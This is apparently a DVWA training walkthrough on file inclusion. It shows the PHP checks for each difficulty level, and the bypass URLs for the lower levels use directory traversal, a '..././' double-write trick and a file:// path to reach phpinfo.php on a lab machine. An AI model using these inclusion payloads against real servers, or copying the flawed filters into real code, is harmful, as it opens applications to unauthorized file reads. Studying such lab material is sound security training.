DVWA for Beginners - File Inclusion
阿新 • Published: 2020-07-23
File Inclusion
File Inclusion means that when an include function is used, improper filtering of its parameter lets a user read and execute unintended content and commands.
low
Server-side core code
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
?>
No filtering at all.
Solution
Nothing is filtered, so include the file directly: http://192.168.37.141:89/vulnerabilities/fi/?page=../../phpinfo.php
medium
Server-side core code
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
$file = str_replace( array( "http://", "https://" ), "", $file );
$file = str_replace( array( "../", "..\"" ), "", $file );
?>
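The code applies a blacklist filter.
Solution
Double-write bypass (str_replace makes a single pass, so removing the inner ../ from ..././ leaves ../ behind): http://192.168.37.141:89/vulnerabilities/fi/?page=..././..././phpinfo.php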
high
Server-side core code
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Input validation
if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}
?>
A whitelist: the file name must either start with "file" or be include.php.
Solution
The file protocol can be used here, so continue by constructing: http://192.168.37.141:89/vulnerabilities/fi/?page=file:///C:\inetpub\target\DVWA\phpinfo.php
impossible
Server-side core code
<?php
// The page we wish to display
$file = $_GET[ 'page' ];
// Only allow include.php or file{1..3}.php
if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}
?>
The whitelist restricts the parameter to a fixed set of values, so arbitrary file inclusion is no longer possible.
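
The following is an added example, not DVWA's own code: it wraps the medium, high and impossible checks shown above in functions and runs the page's own parameter values through them, to show why only the exact-match list holds. The function names (medium_filter, high_allows, impossible_allows) and the sample list are assumptions made for this illustration.

```php
<?php
// Added example, not DVWA source: the checks from each level as functions.

// medium: single-pass blacklist (same replacements as the page's code).
function medium_filter(string $file): string {
    $file = str_replace(array("http://", "https://"), "", $file);
    return str_replace(array("../", "..\""), "", $file);
}

// high: pattern check; any value beginning with "file" is accepted,
// which includes file:// URLs as well as file1.php.
function high_allows(string $file): bool {
    return fnmatch("file*", $file) || $file == "include.php";
}

// impossible: exact-match allow-list of the four known pages.
function impossible_allows(string $file): bool {
    $allowed = array("include.php", "file1.php", "file2.php", "file3.php");
    return in_array($file, $allowed, true);
}

// Constructed sample list: one legitimate page plus the three
// parameter values used in the solutions on this page.
$samples = array(
    'include.php',
    '../../phpinfo.php',
    '..././..././phpinfo.php',
    'file:///C:\inetpub\target\DVWA\phpinfo.php',
);

foreach ($samples as $page) {
    echo "page = $page\n";
    // What the medium filter hands on to the include after stripping.
    echo "  medium passes on : " . medium_filter($page) . "\n";
    echo "  high             : "
        . (high_allows($page) ? "accepted" : "rejected") . "\n";
    echo "  impossible       : "
        . (impossible_allows($page) ? "accepted" : "rejected") . "\n";
}
```

Run it with the PHP command-line interpreter; the value printed for medium is the string that would reach the include after filtering.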